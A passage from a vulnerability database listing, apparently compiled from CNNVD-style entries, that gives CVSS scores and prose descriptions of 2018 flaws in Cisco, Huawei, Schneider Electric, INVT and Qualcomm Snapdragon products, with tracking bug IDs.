This issue is tracked by Cisco Bug IDs CSCvi36518 and CSCvi36549. Cisco Webex Meetings Suite is a set of multifunctional video conferencing solutions from Cisco. Webex Player is one of the players dedicated to playing meeting recorded videos
| VAR-201810-0325 | CVE-2018-0451 | Cisco Tetration Analytics Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the web-based management interface of Cisco Tetration Analytics could allow an authenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a customized link. A successful exploit could allow the attacker to perform arbitrary actions on an affected device by using a web browser and with the privileges of the user. Cisco Tetration Analytics is prone to a cross-site request-forgery vulnerability.
This issue is being tracked by Cisco bug ID CSCvh97957. The product has functions such as trust whitelist, software vulnerability detection and network performance monitoring
| VAR-201810-0326 | CVE-2018-0452 | Cisco Tetration Analytics Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Tetration Analytics could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a customized link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. Cisco Tetration Analytics Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCvh97925. The product has functions such as trust whitelist, software vulnerability detection and network performance monitoring
| VAR-201810-0312 | CVE-2018-0437 | Cisco Umbrella Enterprise Roaming Client Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in the Cisco Umbrella Enterprise Roaming Client (ERC) could allow an authenticated, local attacker to elevate privileges to Administrator. To exploit the vulnerability, the attacker must authenticate with valid local user credentials. This vulnerability is due to improper implementation of file system permissions, which could allow non-administrative users to place files within restricted directories. An attacker could exploit this vulnerability by placing an executable file within the restricted directory, which when executed by the ERC client, would run with Administrator privileges.
This issue is being tracked by Cisco Bug IDs CSCvj46275 and CSCvj48400. Roaming Module is a roaming control module. This vulnerability stems from the fact that the program does not implement file system permissions correctly. Table of contents
| VAR-201810-0311 | CVE-2018-0436 | Cisco Webex Teams Vulnerability in privilege management in |
CVSS V2: 5.5 CVSS V3: 8.7 Severity: HIGH |
A vulnerability in Cisco Webex Teams, formerly Cisco Spark, could allow an authenticated, remote attacker to view and modify data for an organization other than their own organization. The vulnerability exists because the affected software performs insufficient checks for associations between user accounts and organization accounts. An attacker who has administrator or compliance officer privileges for one organization account could exploit this vulnerability by using those privileges to view and modify data for another organization account. No customer data was impacted by this vulnerability. Cisco Webex Teams Exists in a permission management vulnerability.Information may be obtained and information may be tampered with.
An attacker can exploit this issue to obtain sensitive information, bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCvi68464.
Versions prior to Cisco Webex Teams 20180417-150803 are vulnerable. The program includes features such as video conferencing, group messaging and file sharing
| VAR-201810-0299 | CVE-2018-0421 | Cisco Prime Access Registrar Resource management vulnerability |
CVSS V2: 5.0 CVSS V3: 8.6 Severity: HIGH |
A vulnerability in TCP connection management in Cisco Prime Access Registrar could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition when the application unexpectedly restarts. The vulnerability is due to incorrect handling of incoming TCP SYN packets to specific listening ports. The improper handling of the TCP SYN packets could cause a system file description to be allocated and not freed. An attacker could exploit this vulnerability by sending a crafted stream of TCP SYN packets to the application. A successful exploit could allow the attacker to cause the application to eventually restart if a file description cannot be obtained. Multiple Cisco Products are prone to a denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCvk08672. Both Cisco Prime Access Registrar and Prime Access Registrar Jumpstar are the Cisco Prime Access Registrar of Cisco (Cisco)
| VAR-201809-1151 | CVE-2018-7990 | Mate 10 Pro Huawei Vulnerabilities related to security functions in smartphones |
CVSS V2: 4.9 CVSS V3: 4.6 Severity: MEDIUM |
Mate10 Pro Huawei smart phones with the versions before 8.1.0.326(C00) have a FRP bypass vulnerability. During the mobile phone reseting process, an attacker could bypass "Find My Phone" protect after a series of voice and keyboard operations. Successful exploit could allow an attacker to bypass FRP. Mate 10 Pro Huawei Smartphones have security function vulnerabilities.Information may be altered
| VAR-201809-1226 | No CVE | Schneider Electric Modicon TM218LDAE40DRPHN Denial of service vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Schneider Electric Modicon TM218LDAE40DRPHN is a 24/16 PLC from Schneider.
Schneider Electric Modicon TM218LDAE40DRPHN has a remote control vulnerability. An attacker could use the vulnerability to cause a program to crash by sending a large amount of junk data to the PLC 1105 port
| VAR-201809-1201 | No CVE | Memory corruption vulnerability in INVT VS series human-machine interface programming software (HMITool6.0) |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
INVT is a key high-tech enterprise of the National Torch Plan. Its main products include high, medium and low voltage inverters, elevator intelligent control systems, servo systems, PLC, HMI, motors and electric spindles, SVG, UPS, photovoltaic inverters, energy saving and reduction Ranking online management system, rail transit traction system, new energy vehicle electronic control system, etc.
INVT VS series human-machine interface programming software (HMITool6.0) has a memory corruption vulnerability. Attackers can use the vulnerability to parse malformed project files, causing the program to crash and execute arbitrary code
| VAR-201810-1161 | CVE-2018-5914 | plural Snapdragon Vulnerability related to array index verification in products |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Improper input validation in TZ led to array out of bound in TZ function while accessing the peripheral details using the incoming data in Snapdragon Mobile, Snapdragon Wear version MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 835, SDA660. plural Snapdragon The product contains a vulnerability related to array index validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities.
An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Android Bug IDs A-68326803, A-62213176, A-73539234, A-72950814, A-77484228, A-111090697, A-68326811, A-78240387, A-78239234, A-68326819, A-71501117, A-72950958, A-74236425, A-77484229, A-79419793, A-109677940, A-109677982, A-109677964, A-109678202, A-109678380, A-111091377, A-111090533, A-111093202, A-111090698, A-111093021, and A-111093167. Qualcomm MDM9206, etc. are the central processing unit (CPU) products of Qualcomm (Qualcomm) applied to different platforms. An input validation vulnerability exists in TZ in several Qualcomm Snapdragon products. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. The following products (for mobile and wearable devices) are affected: Qualcomm MDM9206; MDM9607; MDM9650; SD 210; SD 212; SD 205; SD 425; SD 430; SD 450; SD 625; SDA660